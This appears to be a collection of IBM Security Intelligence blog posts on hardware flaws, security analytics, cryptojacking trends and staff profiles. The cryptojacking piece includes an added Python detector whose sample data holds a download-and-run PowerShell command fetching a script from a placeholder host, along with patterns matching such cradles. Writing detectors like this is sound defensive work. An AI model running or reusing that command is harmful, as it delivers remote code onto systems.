Since Spectre and Meltdown require local access for exploitation, organizations should continue to focus on preventing threat actors from gaining a foothold in their network. By restricting remote execution and unauthorized access, organizations can do more to prevent threat actors from leveraging Spectre/Meltdown.

Most importantly, continue monitoring threat intelligence feeds for information about new hardware vulnerabilities. Open-source reporting often sensationalizes threats, but a good threat intelligence vendor will provide the nuances and explain the observed usage of a vulnerability (or lack thereof) by threat actors. Though hardware vulnerabilities will undoubtedly be an area of interest for threat actors in years to come, threat intelligence can help your team understand whether threat actors are actually capable of using a vulnerability that’s relevant to your organization and whether its use has already been observed in the wild.

Finally, a great way to stay one step ahead of threat actors is to conduct hardware penetration testing, especially when current-day flaws affect legacy systems that are hard to scan for issues and sometimes hard to patch. Plan periodic testing to examine exposure to vulnerabilities that could negatively affect your infrastructure and gain insight into aligning security controls to have vulnerable assets patched or covered.

Author: Charles DeBeck

IBM Security, Security Analytics, Security Information and Event Management (SIEM), Security Intelligence, Security Intelligence & Analytics, Security Leaders, Security Leadership, Security Operations Center (SOC), Security Professionals, Threat Detection, Threat Intelligence,

Follow the Leaders: 7 Tried-and-True Tips to Get the Most Out of Your Security Analytics

The practice of analyzing security data for detection and response — otherwise known as security analytics (SA) — comes in many forms and flavors. Consumed data varies from organization to organization, analytic processes span a plethora of algorithms and outputs can serve many use cases within a security team.

In early 2019, IBM Security commissioned a survey to better understand how companies currently use security analytics, identify key drivers and uncover some of the net benefits security decision-makers have experienced. The findings were drawn from more than 250 interviews with information security decision-makers around the globe.

7 Lessons From Top Performers in Security Analytics

Encouragingly, the study revealed rising levels of maturity when it comes to security analytics. Roughly 15 percent of all interviewees scored as high performers, meaning their investigation processes are well-defined and they continuously measure the effectiveness of the output. These respondents are especially strong in terms of volume of investigations (five to 10 times more investigations than the average) and false positives (approximately 30 percent below average). Meanwhile, 97 percent of these leaders successfully built a 24/7 security operations center (SOC) with a total staffing headcount between 25 and 50.

What lessons can organizations with lower levels of SA maturity take away from this shining example? Below are seven key lessons security teams can learn from the top performers identified in the survey:

  1. Top SA performers have a knack for integrating security data. While many mid-performing organizations struggle with this integration and consider the task an obstacle to effective security analytics, leaders identified in the survey have streamlined the process, freeing them to focus on use case and content development.
  2. Nine in 10 high performers have an accurate inventory of users and assets — in other words, they understand the enterprise’s boundaries and potential attack surfaces and continuously update their inventory. This is likely a result of effective, automated discovery using a combination of collected security data and active scanning. By comparison, less than 30 percent of low-performing security teams practice this approach.
  3. A robust detection arsenal contains an equal mix of rule-based matching (i.e., indicators of compromise), statistical modeling (i.e., baselining) and machine learning. In stark contrast, intermediate performers rely more on existing threat intelligence as a primary detection method.
  4. Top performers use content provided by their security analytics vendors. In fact, 80 percent of respondents in this category indicated that the vendor-provided content is sufficient, whether sourced out of the box or via services engagements.
  5. Compared to middling performers, top performers dedicate between two and three times more resources to tuning detection tools and algorithms. To be exact, 41 percent of high performers spend 40 hours or more per week on detection tuning.
  6. High-performing security teams automate the output of the analytics and prioritize alerts based on asset and threat criticality. They also have automated investigation playbooks linked to specific alerts.
  7. Finally, organizations with a high level of SA maturity continuously measure their output and understand the importance of time. Approximately 70 percent of top performers keep track of monthly metrics such as time to respond and time spent on investigation. Low-performing organizations, on the other hand, measure the volume of alerts, and their use of time-based metrics is 60 to 70 percent lower than that of high performers.

Build a Faster, More Proactive and More Transparent SOC

So what do the high performers identified in the survey have to show for their security analytics success? For one thing, they all enjoy superb visibility into the performance of their SOC. While many companies are improving, particularly in the areas of cloud and endpoint visibility, 41 percent of leaders in security analytics claim to have full SOC visibility, compared to 13 percent of intermediate and low performers.

In addition, while lower-performing organizations leverage security analytics to investigate and respond — i.e., react — to threats, high performers use SA to stay ahead of threats proactively. Finally, the leaders identified in the study generate their own threat intelligence and are experts in analyzing security data.

The key takeaway here is that security is a race against time — specifically, to outpace cyber adversaries. Leading security teams know this, which is why they continuously challenge themselves by integrating new data, extracting new insights, implementing smart automation, and, most importantly, measuring the time to detect, investigate and respond.

Author: Bart Lenaerts

cryptocurrency, cryptocurrency miner, IBM Security, IBM X-Force Incident Response and Intelligence Services (IRIS), IBM X-Force Research, Incident Response (IR), Ransomware, Skills Gap, threat hunting, Threat Intelligence, X-Force,

Cryptojacking Rises 450 Percent as Cybercriminals Pivot From Ransomware to Stealthier Attacks

Cybercriminals made a lot of noise in 2017 with ransomware attacks like WannaCry and NotPetya, using an in-your-face approach to cyberattacks that netted them millions of dollars from victims. But new research from IBM X-Force, the threat intelligence, research and incident response arm of IBM Security, revealed that 2018 saw a rapid decline in ransomware attacks as cybercrime gangs shifted tactics to remain under the radar.

Ransomware attacks declined by 45 percent between Q1 2018 and Q4 2018, according to the research. That doesn’t mean cybercrime is on the decline, however. Instead, cybercriminals employed cryptojacking, the stealthy theft of computing power to generate cryptocurrency, at a much higher rate. Cryptojacking surged by 450 percent over the course of 2018, according to the newly released “IBM X-Force Threat Intelligence Index 2019.”

Wendi Whitmore, global lead of the IBM X-Force Incident Response and Intelligence Services (IRIS) team, said in an interview that ransomware was highly successful for several years, but the payoff was starting to decline.

“It appears, for a variety of reasons, cybercriminals are getting less money from ransomware attacks and potentially getting a better return on their investment and their time from cryptojacking,” Whitmore said.

IBM X-Force observed a 45 percent decline in ransomware attacks and a 450 percent increase in cryptojacking over the course of 2018, as shown by the trend lines in this chart.

Cryptojacking and Other Stealth Attacks

The term cryptojacking refers to the illicit use of computing resources to generate cryptocurrency such as bitcoin, which peaked in value at nearly $20,000 in late 2017, and Monero, which has generated millions of dollars for cybercriminals over the past decade.

Cryptojacking is carried out either by infecting a victim’s computer with malware or through browser-based injection attacks. The malware uses the processing power of the hijacked computer to mine (generate) cryptocurrency. The spike in central processing unit (CPU) usage may cause systems to slow, and enterprises may be affected by the presence of the malware on their network servers and employee devices.

While less destructive than ransomware, the presence of cryptomining malware in enterprise environments is concerning because it indicates a vulnerability that may be exploited in other attacks.

“The victim doesn’t usually know their computer has been taken over for that purpose,” Whitmore said.

Yet an even stealthier form of attack doesn’t use malware at all. More than half of cyberattacks (57 percent) seen by X-Force IRIS in 2018 did not leverage malware, and many involved the use of nonmalicious tools, including PowerShell, PsExec and other legitimate administrative solutions, allowing attackers to “live off the land” and potentially remain in IT environments longer. These attacks could allow cybercriminals to harvest credentials, run queries, search databases, access user directories and connect to systems of interest.

Attacks that don’t use malware are much more challenging for defense teams to detect, Whitmore said, because they are leveraging tools built into the environment and can’t be identified through signatures or typical malware detection techniques. Instead, defense teams need to detect malicious commands, communications and other actions that might look like legitimate business processes.
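One way to act on that advice is to score process-creation telemetry for the patterns that commonly accompany misuse of built-in tools, rather than looking for a file hash. The block below is an added example, not code from the article or from IBM; it assumes process records already normalized into host, user, parent, image and cmdline fields (as a Sysmon-style pipeline would provide), and both the rule weights and the sample events are constructed for illustration.

```python
"""Added example (not from the article or IBM): score process-creation records for
living-off-the-land patterns so that use of built-in tools such as PowerShell and
PsExec can be surfaced even though no malware signature exists."""
import re
from typing import Callable, Dict, List

Event = Dict[str, str]

# Parent processes that rarely have a legitimate reason to launch a shell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def _cmd_matches(pattern: str) -> Callable[[Event], bool]:
    """Build a predicate that tests the command line against a regex."""
    rx = re.compile(pattern, re.IGNORECASE)
    return lambda ev: bool(rx.search(ev["cmdline"]))


# (rule name, weight, predicate). Weights are constructed for this example.
RULES = [
    # -e / -ec / -enc / -EncodedCommand as a standalone switch.
    ("encoded_command", 3, _cmd_matches(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b")),
    # -w hidden / -WindowStyle hidden.
    ("hidden_window", 2, _cmd_matches(r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b")),
    # In-memory download-and-run primitives.
    ("download_cradle", 3, _cmd_matches(
        r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-Expression|\bIEX\b|Net\.WebClient")),
    ("office_spawned_shell", 3,
     lambda ev: ev["parent"].lower() in OFFICE_PARENTS and ev["image"].lower() in SHELLS),
    # PsExec installs its service binary on the target host.
    ("psexec_service", 3, lambda ev: ev["image"].lower() == "psexesvc.exe"),
]
THRESHOLD = 3  # constructed: one strong indicator is enough to open a ticket


def score_event(ev: Event) -> dict:
    """Evaluate every rule against one record and sum the weights that fired."""
    hits = [name for name, _, pred in RULES if pred(ev)]
    score = sum(w for name, w, _ in RULES if name in hits)
    return {"host": ev["host"], "user": ev["user"], "score": score, "rules": hits}


def analyze(events: List[Event], threshold: int = THRESHOLD) -> List[dict]:
    """Return the records at or above the threshold, highest score first."""
    findings = [score_event(ev) for ev in events]
    flagged = [f for f in findings if f["score"] >= threshold]
    return sorted(flagged, key=lambda f: (-f["score"], f["host"]))


# Constructed sample records; hostnames, users and the URL are invented.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "jdoe", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile Get-ChildItem C:\\Reports"},
    {"host": "ws02", "user": "svc-build", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc QQBBAEEA"},  # payload is just 'AAA'
    {"host": "srv01", "user": "admin", "parent": "services.exe", "image": "PSEXESVC.exe",
     "cmdline": "C:\\Windows\\PSEXESVC.exe"},
    {"host": "ws03", "user": "asmith", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/update.ps1')\""},
    {"host": "ws04", "user": "ops", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -Command Get-Service"},
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(f"{finding['host']:6} {finding['user']:10} score={finding['score']} "
              f"rules={','.join(finding['rules'])}")
```

The weights are deliberately additive so that a single weak signal (a hidden window) does not page anyone, while a document-spawned shell running an encoded command does. In production the same scoring belongs in the SIEM's correlation layer, with the benign-admin cases from your own environment (build servers, deployment tooling) turned into allowlist entries rather than lowered weights.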

“Attackers are identifying that it’s a lot easier to stay in an organization longer-term if they don’t install anything funny that might get detected by a wide variety of technologies, or by really smart defenders who are constantly looking in the environment to identify something that’s new or different,” Whitmore said.

Attackers are infiltrating IT environments with stealthy techniques that target misconfigurations and other system vulnerabilities, Whitmore said, and using tried-and-true methods that are still very difficult to prevent at a wide scale, such as phishing. Publicly disclosed security incidents involving misconfiguration increased by 20 percent between 2017 and 2018, according to X-Force research. Meanwhile, IBM X-Force Red, an autonomous team of veteran hackers within IBM Security who conduct various types of hardware and software vulnerability testing, finds an average of 1,440 unique vulnerabilities per organization.

Still, humans represent one of the largest security weaknesses, with 29 percent of attacks analyzed by IBM X-Force involving compromises via phishing emails. Nearly half (45 percent) of those phishing attempts were business email compromise (BEC) scams, also known as CEO fraud or whaling attacks.

These highly targeted attacks are aimed at individuals responsible for making payments from business accounts, claiming to come from someone inside the organization such as the CEO or chief financial officer (CFO). The FBI reported that between October 2013 and May 2018, BEC fraud had cost organizations $12.5 billion.

Read the complete X-Force Threat Intelligence Index Report

Transportation in the Crosshairs

Among the more surprising findings in this year’s X-Force Threat Intelligence Index report is the level of attacks on the transportation industry, which was the second-most attacked industry in 2018, behind only financial services. In 2017, transportation was the 10th most targeted industry, but in 2018 it was targeted in 13 percent of attacks, behind financial services, which was targeted in 19 percent of attacks.

“That was a pretty surprising finding for us,” Whitmore said. “To see the transportation industry emerge as the second-most impacted industry really means that we’re seeing a lot more activity overall in that industry.”

A few factors changed the game this year, Whitmore noted, including the industry’s growing reliance on data, website applications and mobile apps, and the increasing amount of information consumers are sharing. Transportation companies hold valuable customer data such as payment card information, personally identifiable information (PII) and loyalty rewards accounts. Cybercriminals are interested in targeting that information to monetize it.

Additionally, Whitmore said, there’s “a widespread attack surface in the transportation industry, leveraging things like third-party providers with legacy systems and a lot of communications systems that are out of their direct management.”

Proactive Defenses and Agile Response

There are signs that organizations are increasing their security hygiene by applying best practices such as access controls, patching vulnerabilities in software and hardware, and training employees to spot phishing attempts, Whitmore said.

Yet cybersecurity is a daily fight, and the security skills gap means security teams have to be agile and collaborative while augmenting their capabilities with supporting security technologies and services.

The IBM X-Force Threat Intelligence report offers recommendations for organizations to increase preparedness through preventive measures such as threat hunting — proactively searching networks and endpoints for advanced threats that evade prevention and detection tools.

Additionally, risk management models need to consider likely threat actors, infection methods and potential impact to critical business processes. Organizations need to be aware of risks arising from third parties, such as cloud service providers, suppliers and acquisitions.

Finally, the IBM X-Force Threat Intelligence Index emphasizes remediation and incident response. Even organizations with a mature security posture may not know how to respond to a security incident. Effective incident response is not only a technical matter; leadership and crisis communications are key to rapid response and quickly resuming business operations.


Author: John Zorabedian

Cybercrime, Fraud Protection, Research, Security Awareness, Security Leadership, Security Research, Threat Intelligence, Voices of Security,

Global Cyber Intelligence Maven Limor Kessem Is a Guiding Light for Women in Security

Next time someone says it’s difficult for women to advance in the global security or technology sector, point them in the direction of IBM. At the very top of the tree is Ginni Rometty, global CEO, who is joined by Shamla Naidoo as the chief information security officer (CISO) — just two of the many female executives across the company, all supported by very woman-friendly policies and culture.

That IBM is so supportive of women in security is a source of great pride for Limor Kessem, executive security advisor at IBM Security. Limor herself is an incredibly inspiring woman, having made a U-turn from naturopathic medicine and microbiology to leading governance, risk management and compliance (GRC) processes for content at IBM Security. Today, Limor works with global research groups to deliver actionable threat intelligence and is, without a doubt, one of the company’s top cyber intelligence experts.

“IBM is not a boys’ club; it’s not somewhere only men can move forward,” she says with conviction from her home office, her new baby sleeping soundly in another room. “A lot of executives at IBM are women, which is amazing, and I love it.”

She then lists some of the initiatives the company has in place, from career re-entry for women who left work to raise a family to cybersecurity camps for girls and funding conference tickets for women. Not surprisingly, Limor leads by example, always ready and willing to speak about her experiences as a woman in cybersecurity to anyone who’ll listen at conferences and events, in the corridors at work, and even on social media.

A New Collar Approach Brings New Perspectives to Cybersecurity

She might be a security evangelist today, but Limor’s original plan was to go into naturopathic medicine. She studied microbiology at McGill University in Montreal before changing her mind and moving to naturopathic medicine next.

When she left Canada and moved back to her birthplace, Israel, Limor planned to open her own clinic. She started to investigate entrepreneurial support for women, possible funding sources and even had business cards made up. But one day, on a whim, she decided to translate her CV from French to “terrible Hebrew” and send it out. A security company called her in for an interview.

“I was like, OK, I’ll go check it out, maybe there will be some cash for now, who knows. And it just ended up being this huge life-changing thing,” she recalls.

While the term wasn’t in use yet, Limor thus entered the cybersecurity field as a new collar hire. This is a deliberate hiring practice encouraged by IBM and other companies in which people from different backgrounds and education levels are brought on board with the aim of repurposing their skills for security. IBM, for instance, recognizes the value of military experience and regularly hires veterans for work in incident response. In Limor’s case, the skill she could repurpose was her ability to translate very technical information into something that is easily understood and actionable.

“You take what you’re strong with and the talents you have, and you still get to enjoy them just doing something completely different,” she says. “A lot of people ask me how do I connect my education, my knowledge from microbiology to what you do now? I’m like, hello — viruses!”

Diving Headfirst Into the Fascinating World of Cybercrime

Limor has barely stood still since she joined the global security sector about a decade ago. Back then, she was working in “probably the biggest research lab in the world,” at a time when not many vendors were doing underground and malware research. The processes that exist today hadn’t been defined yet, and the amount of cybercriminal activity taking place on the internet was not widely known. As Limor puts it, she was seeing “crazy stuff” happening in front of her eyes that no one else really knew about.

“Once I found out more about this fascinating world, I developed an immense passion for it,” she recalls. “I started teaching myself, reading everything I could read. I used to spend nights until 1 or 2 a.m. just reading and reading.

“I would sit in the company’s research lab with the malware researchers, the reverse engineers, the cryptography experts. I used to sit with the cyber intelligence folks who would be monitoring dark web forums and chat rooms and speaking undercover to criminals. I couldn’t get enough.”

A Security Manager’s Best Friend

All those conversations and late-night reading sessions paid off. Soon, Limor was spotted by a high-ranking colleague who saw her knowledge as something that should be spread wider — over conference stages. He entrusted her with one of his own speaking opportunities, and she hasn’t stopped since. Limor became a global security evangelist, traveling the world speaking to groups that wanted to know more about the threat landscape: banks, police task forces, military groups and peers. She would explain in detail what they would see in the research labs, what they were digging up that might be relevant to that specific group. And yet Limor herself was still learning, still growing.

Limor Kessem speaks at a cybersecurity conference

Today, she channels that learning and growth into IBM’s threat research, working with all the company’s research teams to implement a strong governance, risk management and compliance (GRC) process and ensure anything released under the IBM Security name is on-message, approved by all involved and, most importantly, useful to security managers seeking information. She brings in researchers, writers and reviewers and works with lawyers from every department, with colleagues across all teams and regions.

“I work with an ecosystem of people who help me be fair and just to everything and everyone that’s involved in a publication like that,” she says. “We’re really helping the community, helping security managers to do their jobs. One of the biggest things any security manager needs to be able to do to properly estimate risks and controls is to understand the threat landscape.”

Limor is essentially the educational editor-in-chief, with her immense security knowledge and a palpable passion for the subject.

And she really goes to bat for those security managers. In a recent interview, she talked about their day-to-day work: A team comes to them wanting a new website, but it’s not as simple as that. The IT manager must consider factors such as the number of customers the site will serve per day, the infrastructure architecture and number of servers needed, but security will have to bring in the right controls, encryption processes, identity management and more. It’s this type of work that requires reliable information about the current threat landscape as it pertains to different projects, and this is what she strives to help deliver to security professionals and management.

A Cry of Support for Women in Security

Limor has spent her adult life to date working in operations and now in risk management, two areas that are informing her latest adventure: motherhood. She’s throwing herself into that role with as much gusto as her ever-growing security responsibilities, showing that women don’t have to make a choice when it comes to careers versus families.

“Don’t think if you have a baby your career is over. It’s not,” Limor says. “If you work for a good organization that supports women, your career is going to stay intact, and you’ll come back with a bang.

“Women should feel good about that and should know that there are other women who are doing it and have had kids and are doing just as well in their careers in security. Not saying it’s easy, because many mothers know it is not, so I hope that organizations in the security sphere make profound changes to their culture to help keep more women on their teams!”

As though on cue, Limor’s own baby daughter lets out a wail in the background, a little cry of support for her mother — an additional cheerleader alongside a very woman-friendly workplace. And Limor is doing her best to make sure that her baby can, if she chooses, follow in her mother’s footsteps and blaze new trails for women in security.

Author: Security Intelligence Staff

Enterprise Security, IBM Cyber Range, Incident Response, Network, Network Protection, Security Services, Threat Intelligence,

How Nat Prakongpan Found His Home on the Cyber Range

While most kids were bickering with siblings and fawning over the newest toys, young Nat Prakongpan was building an enterprise network for his school.

Before he became senior manager at the IBM Integration and Threat Intelligence Lab and built a state-of-the-art cyber range from the ground up, Nat spent his childhood in Thailand surrounded by computers. He started programming at age five. At 13, he was certified in network security by one of Thailand’s national labs.

Such was his passion for computing that he stopped going to school in grade six to teach himself at home and later earn a GED — though Nat is quick to point out that his old school let him hang around without attending class, so he was “socialized.”

“When everyone was in class, I was building the computer lab,” Nat laughs. “That’s how I gained experience in building an enterprise network when I was in grade seven.”

That’s right — Nat built his school’s entire network, deploying around 500 machines with everything an enterprise network needed at that time. But this was right as the internet was starting to boom, and, of course, the system was compromised.

“That’s how I quickly pivoted to learning security,” says Nat. “I took more certification classes when I was 15 and was ultimately able to secure that network.”

From Wunderkind to Network Security Expert

So how does a Thai child genius end up in Atlanta tinkering with IBM Security products to get them to talk to each other? If you ask Nat, it was a “total fluke” — in fact, he says much of his adult life has been a series of happy accidents that led him to build IBM’s Cyber Range from the ground up.

The way Nat tells it, he had a few months between finishing his home-schooling and starting university, so he came to the U.S. to stay with his brother-in-law (who was then earning his master’s degree at the University of Florida) and attend an English-language school. His mother encouraged him to apply at the same university and, much to Nat’s surprise, he was accepted, so he stayed for the five years it took to earn his degree in computer engineering.

Like many of his classmates, he struggled to land a good job right out of school. Cue the next happy accident: A friend dragged him along to an information session by Internet Security Systems (ISS) at his alma mater. He had a chat with the team, and they called him at 7 a.m. the next day and asked him to come in for an interview “now.” He got the job and moved to Atlanta.

In an alternate universe, Nat would have led a very different life.

“I would probably have gone to a technical school somewhere in Thailand and worked at some corporation,” he says. “The U.S. and the job I’m in right now is more research and development, but a lot of jobs in Thailand or in Asia are more product users — looking for products to buy versus what we need to build to make things happen. It would be a lot less interesting.”

Home on the Cyber Range

Instead, Nat ended up at IBM Security following IBM’s acquisition of ISS. Still in Atlanta, he now leads the team that ensures all the individual products from IBM Security can work with and talk to each other to provide seamless end-to-end security for customers.

“We write the glue for those products that makes them work together,” he says. “None of them work together out of the box, but my team has the knowledge across all their areas of expertise to make one story from end to end.”

But Nat’s proudest achievement is the IBM Cyber Range in Cambridge, Massachusetts, the first-ever commercial cyber simulator offering a virtual environment in which companies can interact with real-world scenarios to bolster their threat protection and response capabilities. It’s his baby; he architected the technology, got the funding and designed the scenarios. Nat’s team then created a fictional global corporation with around 3,000 virtual workers, built an enterprise network and invented threats. The end result is a fully immersive simulation developed solely to help organizations and individuals learn about crisis situations and improve their incident response skills.

“The training in the Cyber Range is the ultimate success that I have so far: to be able to teach people and pass on the knowledge of best practices,” he says.

Nat may be among the few who built the facility, but he certainly isn’t the only one who recognizes its value. With the Cambridge location now booked more than half a year out, the IBM team set about its next challenge: taking the cyber simulator experience on tour.

IBMer Nat Prakongpan Found His Home on the Cyber Range

Taking the Range on the Road

“One of the things we’ve learned is that our customers invest a lot of time and resources to come through the Cyber Range in Cambridge,” Nat reflects. “It is difficult for a client to bring all its high-level executives into the same location on the same day.

“We were also having a hard time deciding which IBM office would be the host of our next cyber range.”

At this point, the team began exploring more flexible options that would allow the greatest number of people to benefit from the cyber simulation experience. Ultimately, Nat and his colleagues built the first-of-its-kind IBM X-Force Command Cyber Tactical Operations Center (C-TOC).

The C-TOC is not just a state-of-the-art cyber simulation on wheels — Nat proudly explains that it is “a real security operations center (SOC) able to serve live events such as high-profile conferences and sporting events.” The C-TOC is also designed to respond to a live attack.

“We can drive up to a client’s site and be able to monitor the attack, as well as perform forensic investigation on systems and networks,” Nat says.

Bringing the C-TOC from a dream to reality involved many of the same technical challenges as creating the Cambridge Cyber Range. The C-TOC, however, is a mobile unit built from the ground up, and Nat’s team therefore had a host of additional considerations to account for, including materials, lighting, electrical, air conditioning, ventilation and more. And to top it all off, they had to maintain compliance with motor vehicle regulations in the U.S. and Europe and ensure that all the technology deployed within the unit would be able to survive the twists and turns of the road.

Nat remembers the first time he heard the C-TOC idea mentioned by IBM Security VP Caleb Barlow.

“Obviously my first thought was that this is a great idea and there are so many possibilities for what we can do with this mobile platform,” he recalls. “My second thought, after I had a little more time, was, ‘Wow, I am going to be responsible for making this all happen!’”

To the surprise of none of his teammates, Nat overcame the obstacles associated with the project, and the C-TOC rolled into action in October 2018. This month, the mobile cyber range will begin a tour of Europe, bringing real-world cyber incident training across the continent.

For Nat, the most rewarding aspect of his involvement with both the Cambridge Cyber Range and the C-TOC has been the responses from IBM customers.

“The excitement we have seen over these projects was phenomenal,” he says. “I think the C-TOC especially also inspires the next generation of youngsters and college students to see what’s possible in cybersecurity and how they can be involved.”

The post How Nat Prakongpan Found His Home on the Cyber Range appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Lauren McMenemy
